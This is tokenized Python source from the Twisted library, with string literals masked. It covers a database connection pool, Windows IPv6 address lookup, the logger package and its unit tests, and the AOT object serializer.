, * args , ** kw ) : <EOL> conn = self . connectionFactory ( self ) <EOL> trans = self . transactionFactory ( self , conn ) <EOL> try : <EOL> result = interaction ( trans , * args , ** kw ) <EOL> trans . close ( ) <EOL> conn . commit ( ) <EOL> return result <EOL> except : <EOL> excType , excValue , excTraceback = sys . exc_info ( ) <EOL> try : <EOL> conn . rollback ( ) <EOL> except : <EOL> log . err ( None , "<STR_LIT>" ) <EOL> raise excType , excValue , excTraceback <EOL> def _runQuery ( self , trans , * args , ** kw ) : <EOL> trans . execute ( * args , ** kw ) <EOL> return trans . fetchall ( ) <EOL> def _runOperation ( self , trans , * args , ** kw ) : <EOL> trans . execute ( * args , ** kw ) <EOL> def __getstate__ ( self ) : <EOL> return { '<STR_LIT>' : self . dbapiName , <EOL> '<STR_LIT>' : self . min , <EOL> '<STR_LIT>' : self . max , <EOL> '<STR_LIT>' : self . noisy , <EOL> '<STR_LIT>' : self . 
reconnect , <EOL> '<STR_LIT>' : self . good_sql , <EOL> '<STR_LIT>' : self . connargs , <EOL> '<STR_LIT>' : self . connkw } <EOL> def __setstate__ ( self , state ) : <EOL> self . __dict__ = state <EOL> self . __init__ ( self . dbapiName , * self . connargs , ** self . connkw ) <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> from socket import socket , AF_INET6 , SOCK_STREAM <EOL> from ctypes import ( <EOL> WinDLL , byref , create_string_buffer , c_int , c_void_p , <EOL> POINTER , Structure , cast , string_at ) <EOL> WS2_32 = WinDLL ( '<STR_LIT>' ) <EOL> SOCKET = c_int <EOL> DWORD = c_int <EOL> LPVOID = c_void_p <EOL> LPSOCKADDR = c_void_p <EOL> LPWSAPROTOCOL_INFO = c_void_p <EOL> LPTSTR = c_void_p <EOL> LPDWORD = c_void_p <EOL> LPWSAOVERLAPPED = c_void_p <EOL> LPWSAOVERLAPPED_COMPLETION_ROUTINE = c_void_p <EOL> WSAIoctl = WS2_32 . WSAIoctl <EOL> WSAIoctl . argtypes = [ <EOL> SOCKET , DWORD , LPVOID , DWORD , LPVOID , DWORD , LPDWORD , <EOL> LPWSAOVERLAPPED , LPWSAOVERLAPPED_COMPLETION_ROUTINE ] <EOL> WSAIoctl . restype = c_int <EOL> WSAAddressToString = WS2_32 . WSAAddressToStringA <EOL> WSAAddressToString . argtypes = [ <EOL> LPSOCKADDR , DWORD , LPWSAPROTOCOL_INFO , LPTSTR , LPDWORD ] <EOL> WSAAddressToString . restype = c_int <EOL> SIO_ADDRESS_LIST_QUERY = <NUM_LIT> <EOL> WSAEFAULT = <NUM_LIT> <EOL> class SOCKET_ADDRESS ( Structure ) : <EOL> _fields_ = [ ( '<STR_LIT>' , c_void_p ) , <EOL> ( '<STR_LIT>' , c_int ) ] <EOL> def make_SAL ( ln ) : <EOL> class SOCKET_ADDRESS_LIST ( Structure ) : <EOL> _fields_ = [ ( '<STR_LIT>' , c_int ) , <EOL> ( '<STR_LIT>' , SOCKET_ADDRESS * ln ) ] <EOL> return SOCKET_ADDRESS_LIST <EOL> def win32GetLinkLocalIPv6Addresses ( ) : <EOL> """<STR_LIT>""" <EOL> s = socket ( AF_INET6 , SOCK_STREAM ) <EOL> size = <NUM_LIT> <EOL> retBytes = c_int ( ) <EOL> for i in range ( <NUM_LIT:2> ) : <EOL> buf = create_string_buffer ( size ) <EOL> ret = WSAIoctl ( <EOL> s . fileno ( ) , <EOL> SIO_ADDRESS_LIST_QUERY , <NUM_LIT:0> , <NUM_LIT:0> , buf , size , byref ( retBytes ) , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> if ret and retBytes . value : <EOL> size = retBytes . 
value <EOL> else : <EOL> break <EOL> if ret : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> addrList = cast ( buf , POINTER ( make_SAL ( <NUM_LIT:0> ) ) ) <EOL> addrCount = addrList [ <NUM_LIT:0> ] . iAddressCount <EOL> addrList = cast ( buf , POINTER ( make_SAL ( addrCount ) ) ) <EOL> addressStringBufLength = <NUM_LIT> <EOL> addressStringBuf = create_string_buffer ( addressStringBufLength ) <EOL> retList = [ ] <EOL> for i in range ( addrList [ <NUM_LIT:0> ] . iAddressCount ) : <EOL> retBytes . value = addressStringBufLength <EOL> address = addrList [ <NUM_LIT:0> ] . Address [ i ] <EOL> ret = WSAAddressToString ( <EOL> address . lpSockaddr , address . iSockaddrLength , <NUM_LIT:0> , addressStringBuf , <EOL> byref ( retBytes ) ) <EOL> if ret : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> retList . append ( string_at ( addressStringBuf ) ) <EOL> return [ addr for addr in retList if '<STR_LIT:%>' in addr ] </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> ] <EOL> from . _levels import InvalidLogLevelError , LogLevel <EOL> from . _flatten import extractField <EOL> from . _format import ( <EOL> formatEvent , formatEventAsClassicLogText , formatTime , timeFormatRFC3339 , <EOL> ) <EOL> from . _logger import Logger , _loggerFor <EOL> from . _observer import ILogObserver , LogPublisher <EOL> from . _buffer import LimitedHistoryLogObserver <EOL> from . _file import FileLogObserver , textFileLogObserver <EOL> from . _filter import ( <EOL> PredicateResult , ILogFilterPredicate , FilteringLogObserver , <EOL> LogLevelFilterPredicate <EOL> ) <EOL> from . _stdlib import STDLibLogObserver <EOL> from . _io import LoggingFile <EOL> from . _legacy import LegacyLogObserverWrapper <EOL> from . _global import ( <EOL> globalLogPublisher , globalLogBeginner , LogBeginner <EOL> ) <EOL> from . _json import ( <EOL> eventAsJSON , eventFromJSON , <EOL> jsonFileLogObserver , eventsFromJSONLogFile <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from twisted . trial import unittest <EOL> from . . _levels import InvalidLogLevelError <EOL> from . . _levels import LogLevel <EOL> from . . _format import formatEvent <EOL> from . . _logger import Logger <EOL> from . . _global import globalLogPublisher <EOL> class TestLogger ( Logger ) : <EOL> """<STR_LIT>""" <EOL> def emit ( self , level , format = None , ** kwargs ) : <EOL> def observer ( event ) : <EOL> self . event = event <EOL> globalLogPublisher . addObserver ( observer ) <EOL> try : <EOL> Logger . emit ( self , level , format , ** kwargs ) <EOL> finally : <EOL> globalLogPublisher . removeObserver ( observer ) <EOL> self . emitted = { <EOL> "<STR_LIT>" : level , <EOL> "<STR_LIT>" : format , <EOL> "<STR_LIT>" : kwargs , <EOL> } <EOL> class LogComposedObject ( object ) : <EOL> """<STR_LIT>""" <EOL> log = TestLogger ( ) <EOL> def __init__ ( self , state = None ) : <EOL> self . state = state <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" . format ( state = self . state ) <EOL> class LoggerTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_repr ( self ) : <EOL> """<STR_LIT>""" <EOL> namespace = "<STR_LIT>" <EOL> log = Logger ( namespace ) <EOL> self . assertEqual ( repr ( log ) , "<STR_LIT>" . format ( repr ( namespace ) ) ) <EOL> def test_namespaceDefault ( self ) : <EOL> """<STR_LIT>""" <EOL> log = Logger ( ) <EOL> self . assertEqual ( log . namespace , __name__ ) <EOL> def test_namespaceAttribute ( self ) : <EOL> """<STR_LIT>""" <EOL> obj = LogComposedObject ( ) <EOL> expectedNamespace = "<STR_LIT>" . format ( <EOL> obj . __module__ , <EOL> obj . __class__ . __name__ , <EOL> ) <EOL> self . assertEqual ( obj . log . namespace , expectedNamespace ) <EOL> self . assertEqual ( LogComposedObject . log . namespace , expectedNamespace ) <EOL> self . assertIs ( LogComposedObject . log . source , LogComposedObject ) <EOL> self . assertIs ( obj . log . source , obj ) <EOL> self . assertIs ( Logger ( ) . 
source , None ) <EOL> def test_descriptorObserver ( self ) : <EOL> """<STR_LIT>""" <EOL> observed = [ ] <EOL> class MyObject ( object ) : <EOL> log = Logger ( observer = observed . append ) <EOL> MyObject . log . info ( "<STR_LIT:hello>" ) <EOL> self . assertEqual ( len ( observed ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( observed [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , "<STR_LIT:hello>" ) <EOL> def test_sourceAvailableForFormatting ( self ) : <EOL> """<STR_LIT>""" <EOL> obj = LogComposedObject ( "<STR_LIT:hello>" ) <EOL> log = obj . log <EOL> log . error ( "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , log . event ) <EOL> self . assertEqual ( log . event [ "<STR_LIT>" ] , obj ) <EOL> stuff = formatEvent ( log . event ) <EOL> self . assertIn ( "<STR_LIT>" , stuff ) <EOL> def test_basicLogger ( self ) : <EOL> """<STR_LIT>""" <EOL> log = TestLogger ( ) <EOL> for level in LogLevel . iterconstants ( ) : <EOL> format = "<STR_LIT>" <EOL> message = format . format ( level_name = level . name ) <EOL> logMethod = getattr ( log , level . name ) <EOL> logMethod ( format , junk = message , level_name = level . name ) <EOL> self . assertEqual ( log . emitted [ "<STR_LIT>" ] , level ) <EOL> self . assertEqual ( log . emitted [ "<STR_LIT>" ] , format ) <EOL> self . assertEqual ( log . emitted [ "<STR_LIT>" ] [ "<STR_LIT>" ] , message ) <EOL> self . assertTrue ( hasattr ( log , "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> self . assertEqual ( log . event [ "<STR_LIT>" ] , format ) <EOL> self . assertEqual ( log . event [ "<STR_LIT>" ] , level ) <EOL> self . assertEqual ( log . event [ "<STR_LIT>" ] , __name__ ) <EOL> self . assertEqual ( log . event [ "<STR_LIT>" ] , None ) <EOL> self . assertEqual ( log . event [ "<STR_LIT>" ] , message ) <EOL> self . assertEqual ( formatEvent ( log . event ) , message ) <EOL> def test_sourceOnClass ( self ) : <EOL> """<STR_LIT>""" <EOL> def observer ( event ) : <EOL> self . 
assertEqual ( event [ "<STR_LIT>" ] , Thingo ) <EOL> class Thingo ( object ) : <EOL> log = TestLogger ( observer = observer ) <EOL> Thingo . log . info ( ) <EOL> def test_sourceOnInstance ( self ) : <EOL> """<STR_LIT>""" <EOL> def observer ( event ) : <EOL> self . assertEqual ( event [ "<STR_LIT>" ] , thingo ) <EOL> class Thingo ( object ) : <EOL> log = TestLogger ( observer = observer ) <EOL> thingo = Thingo ( ) <EOL> thingo . log . info ( ) <EOL> def test_sourceUnbound ( self ) : <EOL> """<STR_LIT>""" <EOL> def observer ( event ) : <EOL> self . assertEqual ( event [ "<STR_LIT>" ] , None ) <EOL> log = TestLogger ( observer = observer ) <EOL> log . info ( ) <EOL> def test_defaultFailure ( self ) : <EOL> """<STR_LIT>""" <EOL> log = TestLogger ( ) <EOL> try : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> except RuntimeError : <EOL> log . failure ( "<STR_LIT>" ) <EOL> errors = self . flushLoggedErrors ( RuntimeError ) <EOL> self . assertEqual ( len ( errors ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( log . emitted [ "<STR_LIT>" ] , LogLevel . critical ) <EOL> self . assertEqual ( log . emitted [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def test_conflictingKwargs ( self ) : <EOL> """<STR_LIT>""" <EOL> log = TestLogger ( ) <EOL> log . warn ( <EOL> u"<STR_LIT:*>" , <EOL> log_format = "<STR_LIT:#>" , <EOL> log_level = LogLevel . error , <EOL> log_namespace = "<STR_LIT>" , <EOL> log_source = "<STR_LIT>" , <EOL> ) <EOL> self . assertEqual ( log . event [ "<STR_LIT>" ] , u"<STR_LIT:*>" ) <EOL> self . assertEqual ( log . event [ "<STR_LIT>" ] , LogLevel . warn ) <EOL> self . assertEqual ( log . event [ "<STR_LIT>" ] , log . namespace ) <EOL> self . assertEqual ( log . event [ "<STR_LIT>" ] , None ) <EOL> def test_logInvalidLogLevel ( self ) : <EOL> """<STR_LIT>""" <EOL> log = TestLogger ( ) <EOL> log . emit ( "<STR_LIT>" ) <EOL> errors = self . flushLoggedErrors ( InvalidLogLevelError ) <EOL> self . 
assertEqual ( len ( errors ) , <NUM_LIT:1> ) <EOL> def test_trace ( self ) : <EOL> """<STR_LIT>""" <EOL> def publisher ( event ) : <EOL> observer ( event ) <EOL> def observer ( event ) : <EOL> self . assertEqual ( event [ "<STR_LIT>" ] , [ ( log , publisher ) ] ) <EOL> log = TestLogger ( observer = publisher ) <EOL> log . info ( "<STR_LIT>" , log_trace = [ ] ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> import types , re <EOL> try : <EOL> from tokenize import generate_tokens as tokenize <EOL> except ImportError : <EOL> from tokenize import tokenize <EOL> try : <EOL> import copy_reg <EOL> except : <EOL> import copyreg as copy_reg <EOL> from twisted . python import reflect , log <EOL> from twisted . persisted import crefutil <EOL> from twisted . python . compat import unicode , _PY3 , _constructMethod <EOL> class Named : <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> class Class ( Named ) : <EOL> def getSource ( self ) : <EOL> return "<STR_LIT>" % self . name <EOL> class Function ( Named ) : <EOL> def getSource ( self ) : <EOL> return "<STR_LIT>" % self . name <EOL> class Module ( Named ) : <EOL> def getSource ( self ) : <EOL> return "<STR_LIT>" % self . name <EOL> class InstanceMethod : <EOL> def __init__ ( self , name , klass , inst ) : <EOL> if not ( isinstance ( inst , Ref ) or isinstance ( inst , Instance ) or isinstance ( inst , Deref ) ) : <EOL> raise TypeError ( "<STR_LIT>" % inst ) <EOL> self . name = name <EOL> self . klass = klass <EOL> self . instance = inst <EOL> def getSource ( self ) : <EOL> return "<STR_LIT>" % ( self . name , self . klass , prettify ( self . instance ) ) <EOL> class _NoStateObj : <EOL> pass <EOL> NoStateObj = _NoStateObj ( ) <EOL> _SIMPLE_BUILTINS = [ <EOL> bool , bytes , unicode , int , float , complex , type ( None ) , <EOL> slice , type ( Ellipsis ) <EOL> ] <EOL> try : <EOL> _SIMPLE_BUILTINS . append ( long ) <EOL> except NameError : <EOL> pass <EOL> class Instance : <EOL> def __init__ ( self , className , __stateObj__ = NoStateObj , ** state ) : <EOL> if not isinstance ( className , str ) : <EOL> raise TypeError ( "<STR_LIT>" % className ) <EOL> self . klass = className <EOL> if __stateObj__ is not NoStateObj : <EOL> self . state = __stateObj__ <EOL> self . stateIsDict = <NUM_LIT:0> <EOL> else : <EOL> self . 
state = state <EOL> self . stateIsDict = <NUM_LIT:1> <EOL> def getSource ( self ) : <EOL> if self . stateIsDict : <EOL> stateDict = self . state <EOL> elif isinstance ( self . state , Ref ) and isinstance ( self . state . obj , dict ) : <EOL> stateDict = self . state . obj <EOL> else : <EOL> stateDict = None <EOL> if stateDict is not None : <EOL> try : <EOL> return "<STR_LIT>" % ( self . klass , dictToKW ( stateDict ) ) <EOL> except NonFormattableDict : <EOL> return "<STR_LIT>" % ( self . klass , prettify ( stateDict ) ) <EOL> return "<STR_LIT>" % ( self . klass , prettify ( self . state ) ) <EOL> class Ref : <EOL> def __init__ ( self , * args ) : <EOL> if len ( args ) == <NUM_LIT:2> : <EOL> self . refnum = args [ <NUM_LIT:0> ] <EOL> self . obj = args [ <NUM_LIT:1> ] <EOL> elif not args : <EOL> self . refnum = None <EOL> self . obj = None <EOL> def setRef ( self , num ) : <EOL> if self . refnum : <EOL> raise ValueError ( "<STR_LIT>" % ( num , self . refnum ) ) <EOL> self . refnum = num <EOL> def setObj ( self , obj ) : <EOL> if self . obj : <EOL> raise ValueError ( "<STR_LIT>" % ( obj , self . obj ) ) <EOL> self . obj = obj <EOL> def getSource ( self ) : <EOL> if self . obj is None : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> if self . refnum : <EOL> return "<STR_LIT>" % ( self . refnum , prettify ( self . obj ) ) <EOL> return prettify ( self . obj ) <EOL> class Deref : <EOL> def __init__ ( self , num ) : <EOL> self . refnum = num <EOL> def getSource ( self ) : <EOL> return "<STR_LIT>" % self . refnum <EOL> __repr__ = getSource <EOL> class Copyreg : <EOL> def __init__ ( self , loadfunc , state ) : <EOL> self . loadfunc = loadfunc <EOL> self . state = state <EOL> def getSource ( self ) : <EOL> return "<STR_LIT>" % ( self . loadfunc , prettify ( self . state ) ) <EOL> def getSource ( ao ) : <EOL> """<STR_LIT>""" <EOL> return indentify ( "<STR_LIT>" + prettify ( ao ) ) <EOL> class NonFormattableDict ( Exception ) : <EOL> """<STR_LIT>""" <EOL> r = re . 
compile ( '<STR_LIT>' ) <EOL> def dictToKW ( d ) : <EOL> out = [ ] <EOL> items = list ( d . items ( ) ) <EOL> items . sort ( ) <EOL> for k , v in items : <EOL> if not isinstance ( k , str ) : <EOL> raise NonFormattableDict ( "<STR_LIT>" % k ) <EOL> if not r . match ( k ) : <EOL> raise NonFormattableDict ( "<STR_LIT>" % k ) <EOL> out . append ( <EOL> "<STR_LIT>" % ( k , prettify ( v ) ) <EOL> ) <EOL> return '<STR_LIT>' . join ( out ) <EOL> def prettify ( obj ) : <EOL> if hasattr ( obj , '<STR_LIT>' ) : <EOL> return obj . getSource ( ) <EOL> else : <EOL> t = type ( obj ) <EOL> if t in _SIMPLE_BUILTINS : <EOL> return repr ( obj ) <EOL> elif t is dict : <EOL> out = [ '<STR_LIT:{>' ] <EOL> for k , v in obj . items ( ) : <EOL> out . append ( '<STR_LIT>' % ( prettify ( k ) , prettify ( v ) ) ) <EOL> out . append ( len ( obj ) and '<STR_LIT>' or '<STR_LIT:}>' ) <EOL> return '<STR_LIT>' . join ( out ) <EOL> elif t is list : <EOL> out = [ "<STR_LIT:[>" ] <EOL> for x in obj : <EOL> out . append ( '<STR_LIT>' % prettify ( x ) ) <EOL> out . append ( len ( obj ) and '<STR_LIT>' or '<STR_LIT:]>' ) <EOL> return '<STR_LIT>' . join ( out ) <EOL> elif t is tuple : <EOL> out = [ "<STR_LIT:(>" ] <EOL> for x in obj : <EOL> out . append ( '<STR_LIT>' % prettify ( x ) ) <EOL> out . append ( len ( obj ) and '<STR_LIT>' or '<STR_LIT:)>' ) <EOL> return '<STR_LIT>' . join ( out ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" % ( t , obj ) ) <EOL> def indentify ( s ) : <EOL> out = [ ] <EOL> stack = [ ] <EOL> l = [ '<STR_LIT>' , s ] <EOL> for ( tokenType , tokenString , ( startRow , startColumn ) , <EOL> ( endRow , endColumn ) , logicalLine ) in tokenize ( l . pop ) : <EOL> if tokenString in [ '<STR_LIT:[>' , '<STR_LIT:(>' , '<STR_LIT:{>' ] : <EOL> stack . append ( tokenString ) <EOL> elif tokenString in [ '<STR_LIT:]>' , '<STR_LIT:)>' , '<STR_LIT:}>' ] : <EOL> stack . pop ( ) <EOL> if tokenString == '<STR_LIT>' : <EOL> out . 
append ( '<STR_LIT:U+0020>' * len ( stack ) ) <EOL> else : <EOL> out . append ( tokenString ) <EOL> return '<STR_LIT>' . join ( out ) <EOL> def unjellyFromAOT ( aot ) : <EOL> """<STR_LIT>""" <EOL> return AOTUnjellier ( ) . unjelly ( aot ) <EOL> def unjellyFromSource ( stringOrFile ) : <EOL> """<STR_LIT>""" <EOL> ns = { "<STR_LIT>" : Instance , <EOL> "<STR_LIT>" : InstanceMethod , <EOL> "<STR_LIT>" : Class , <EOL> "<STR_LIT>" : Function , <EOL> "<STR_LIT>" : Module , <EOL> "<STR_LIT>" : Ref , <EOL> "<STR_LIT>" : Deref , <EOL> "<STR_LIT>" : Copyreg , <EOL> } <EOL> if hasattr ( stringOrFile , "<STR_LIT>" ) : <EOL> source = stringOrFile . read ( ) <EOL> else : <EOL> source = stringOrFile <EOL> code = compile ( source , "<STR_LIT>" , "<STR_LIT>" ) <EOL> eval ( code , ns , ns ) <EOL> if '<STR_LIT>' in ns : <EOL> return unjellyFromAOT ( ns [ '<STR_LIT>' ] ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % stringOrFile ) <EOL> class AOTUnjellier : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . references = { } <EOL> self . stack = [ ] <EOL> self . afterUnjelly = [ ] <EOL> def unjellyLater ( self , node ) : <EOL> """<STR_LIT>""" <EOL> d = crefutil . _Defer ( ) <EOL> self . unjellyInto ( d , <NUM_LIT:0> , node ) <EOL> return d <EOL> def unjellyInto ( self , obj , loc , ao ) : <EOL> """<STR_LIT>""" <EOL> o = self . unjellyAO ( ao ) <EOL> obj [ loc ] = o <EOL> if isinstance ( o , crefutil . NotKnown ) : <EOL> o . addDependant ( obj , loc ) <EOL> return o <EOL> def callAfter ( self , callable , result ) : <EOL> if isinstance ( result , crefutil . NotKnown ) : <EOL> l = [ None ] <EOL> result . addDependant ( l , <NUM_LIT:1> ) <EOL> else : <EOL> l = [ result ] <EOL> self . afterUnjelly . append ( ( callable , l ) ) <EOL> def unjellyAttribute ( self , instance , attrName , ao ) : <EOL> """<STR_LIT>""" <EOL> self . unjellyInto ( instance . __dict__ , attrName , ao ) <EOL> def unjellyAO ( self , ao ) : <EOL> """<STR_LIT>""" <EOL> self . stack . 
append ( ao ) <EOL> t = type ( ao ) <EOL> if t in _SIMPLE_BUILTINS : <EOL> return ao <EOL> elif t is list : <EOL> l = [ ] <EOL> for x in ao : <EOL> l . append ( None ) <EOL> self . unjellyInto ( l , len ( l ) - <NUM_LIT:1> , x ) <EOL> return l <EOL> elif t is tuple : <EOL> l = [ ] <EOL> tuple_ = tuple <EOL> for x in ao : <EOL> l . append ( None ) <EOL> if isinstance ( self . unjellyInto ( l , len ( l ) - <NUM_LIT:1> , x ) , crefutil . NotKnown ) : <EOL> tuple_ = crefutil . _Tuple <EOL> return tuple_ ( l ) <EOL> elif t is dict : <EOL> d = { } <EOL> for k , v in ao . items ( ) : <EOL> kvd = crefutil . _DictKeyAndValue ( d ) <EOL> self . unjellyInto ( kvd , <NUM_LIT:0> , k ) <EOL> self . unjellyInto ( kvd , <NUM_LIT:1> , v ) <EOL> return d <EOL> else : <EOL> c = ao . __class__ <EOL> if c is Module : <EOL> return reflect . namedModule ( ao . name ) <EOL> elif c in [ Class , Function ] or issubclass ( c , type ) : <EOL> return reflect . namedObject ( ao . name ) <EOL> elif c is InstanceMethod : <EOL> im_name = ao . name <EOL> im_class = reflect . namedObject ( ao . klass ) <EOL> im_self = self . unjellyAO ( ao . instance ) <EOL> if im_name in im_class . __dict__ : <EOL> if im_self is None : <EOL> return getattr ( im_class , im_name ) <EOL> elif isinstance ( im_self , crefutil . NotKnown ) : <EOL> return crefutil . _InstanceMethod ( im_name , im_self , im_class ) <EOL> else : <EOL> return _constructMethod ( im_class , im_name , im_self ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> elif c is Instance : <EOL> klass = reflect . namedObject ( ao . klass ) <EOL> state = self . unjellyAO ( ao . state ) <EOL> if hasattr ( klass , "<STR_LIT>" ) : <EOL> inst = klass . __new__ ( klass ) <EOL> else : <EOL> inst = _OldStyleInstance ( klass ) <EOL> if hasattr ( klass , "<STR_LIT>" ) : <EOL> self . callAfter ( inst . __setstate__ , state ) <EOL> else : <EOL> inst . __dict__ = state <EOL> return inst <EOL> elif c is Ref : <EOL> o = self . unjellyAO ( ao . 
obj ) <EOL> refkey = ao . refnum <EOL> ref = self . references . get ( refkey ) <EOL> if ref is None : <EOL> self . references [ refkey ] = o <EOL> elif isinstance ( ref , crefutil . NotKnown ) : <EOL> ref . resolveDependants ( o ) <EOL> self . references [ refkey ] = o <EOL> elif refkey is None : <EOL> pass <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % ( ref , refkey , ao ) ) <EOL> return o <EOL> elif c is Deref : <EOL> num = ao . refnum <EOL> ref = self . references . get ( num ) <EOL> if ref is None : <EOL> der = crefutil . _Dereference ( num ) <EOL> self . references [ num ] = der <EOL> return der <EOL> return ref <EOL> elif c is Copyreg : <EOL> loadfunc = reflect . namedObject ( ao . loadfunc ) <EOL> d = self . unjellyLater ( ao . state ) . addCallback ( <EOL> lambda result , _l : _l ( * result ) , loadfunc ) <EOL> return d <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" % t ) <EOL> del self . stack [ - <NUM_LIT:1> ] <EOL> def unjelly ( self , ao ) : <EOL> try : <EOL> l = [ None ] <EOL> self . unjellyInto ( l , <NUM_LIT:0> , ao ) <EOL> for func , v in self . afterUnjelly : <EOL> func ( v [ <NUM_LIT:0> ] ) <EOL> return l [ <NUM_LIT:0> ] <EOL> except : <EOL> log . msg ( "<STR_LIT>" ) <EOL> log . msg ( "<STR_LIT:\n>" . join ( map ( repr , self . stack ) ) ) <EOL> raise <EOL> def jellyToAOT ( obj ) : <EOL> """<STR_LIT>""" <EOL> return AOTJellier ( ) . jelly ( obj ) <EOL> def jellyToSource ( obj , file = None ) : <EOL> """<STR_LIT>""" <EOL> aot = jellyToAOT ( obj ) <EOL> if file : <EOL> file . write ( getSource ( aot ) . encode ( "<STR_LIT:utf-8>" ) ) <EOL> else : <EOL> return getSource ( aot ) <EOL> try : <EOL> from types import ( ClassType as _OldStyleClass , <EOL> InstanceType as _OldStyleInstance ) <EOL> except ImportError : <EOL> _OldStyleClass = None <EOL> _OldStyleInstance = None <EOL> def _classOfMethod ( methodObject ) : <EOL> """<STR_LIT>""" <EOL> if _PY3 : <EOL> return methodObject . __self__ . __class__ <EOL> return methodObject . 
im_class <EOL> def _funcOfMethod ( methodObject ) : <EOL> """<STR_LIT>""" <EOL> if _PY3 : <EOL> return methodObject . __func__ <EOL> return methodObject . im_func <EOL> def _selfOfMethod ( methodObject ) : <EOL> """<STR_LIT>""" <EOL> if _PY3 : <EOL> return methodObject . __self__ <EOL> return methodObject . im_self <EOL> class AOTJellier : <EOL> def __init__ ( self ) : <EOL> self . prepared = { } <EOL> self . _ref_id = <NUM_LIT:0> <EOL> self . stack = [ ] <EOL> def prepareForRef ( self , aoref , object ) : <EOL> """<STR_LIT>""" <EOL> self . prepared [ id ( object ) ] = aoref <EOL> def jellyToAO ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> objType = type ( obj ) <EOL> self . stack . append ( repr ( obj ) ) <EOL> if objType in _SIMPLE_BUILTINS : <EOL> retval = obj <EOL> elif objType is types . MethodType : <EOL> retval = InstanceMethod ( _funcOfMethod ( obj ) . __name__ , <EOL> reflect . qual ( _classOfMethod ( obj ) ) , <EOL> self . jellyToAO ( _selfOfMethod ( obj ) ) ) <EOL> elif objType is types . ModuleType : <EOL> retval = Module ( obj . __name__ ) <EOL> elif objType is _OldStyleClass : <EOL> retval = Class ( reflect . qual ( obj ) ) <EOL> elif issubclass ( objType , type ) : <EOL> retval = Class ( reflect . qual ( obj ) ) <EOL> elif objType is types . FunctionType : <EOL> retval = Function ( reflect . fullFuncName ( obj ) ) <EOL> else : <EOL> if id ( obj ) in self . prepared : <EOL> oldRef = self . prepared [ id ( obj ) ] <EOL> if oldRef . refnum : <EOL> key = oldRef . refnum <EOL> else : <EOL> self . _ref_id = self . _ref_id + <NUM_LIT:1> <EOL> key = self . _ref_id <EOL> oldRef . setRef ( key ) <EOL> return Deref ( key ) <EOL> retval = Ref ( ) <EOL> def _stateFrom ( state ) : <EOL> retval . setObj ( Instance ( reflect . qual ( obj . __class__ ) , <EOL> self . jellyToAO ( state ) ) ) <EOL> self . prepareForRef ( retval , obj ) <EOL> if objType is list : <EOL> retval . setObj ( [ self . 
jellyToAO ( o ) for o in obj ] ) <EOL> elif objType is tuple : <EOL> retval . setObj ( tuple ( map ( self . jellyToAO , obj ) ) ) <EOL> elif objType is dict : <EOL> d = { } <EOL> for k , v in obj . items ( ) : <EOL> d [ self . jellyToAO ( k ) ] = self . jellyToAO ( v ) <EOL> retval . setObj ( d ) <EOL> elif objType in copy_reg . dispatch_table : <EOL> unpickleFunc , state = copy_reg . dispatch_table [ objType ] ( obj ) <EOL> retval . setObj ( Copyreg ( reflect . fullFuncName ( unpickleFunc ) , <EOL> self . jellyToAO ( state ) ) ) <EOL> elif hasattr ( obj , "<STR_LIT>" ) : <EOL> _stateFrom ( obj . __getstate__ ( ) ) <EOL> elif hasattr ( obj , "<STR_LIT>" ) : <EOL> _stateFrom ( obj . __dict__ ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" % objType . __name__ ) <EOL> del self . stack [ - <NUM_LIT:1> ] <EOL> return retval <EOL> def jelly ( self , obj ) : <EOL> try : <EOL> ao = self . jellyToAO ( obj ) <EOL> return ao <EOL> except : <EOL> log . msg ( "<STR_LIT>" ) <EOL> log . msg ( '<STR_LIT:\n>' . join ( self . stack ) ) <EOL> raise </s>
<s> """<STR_LIT>""" <EOL> from . _wrapper import proxyEndpoint <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> ] </s>
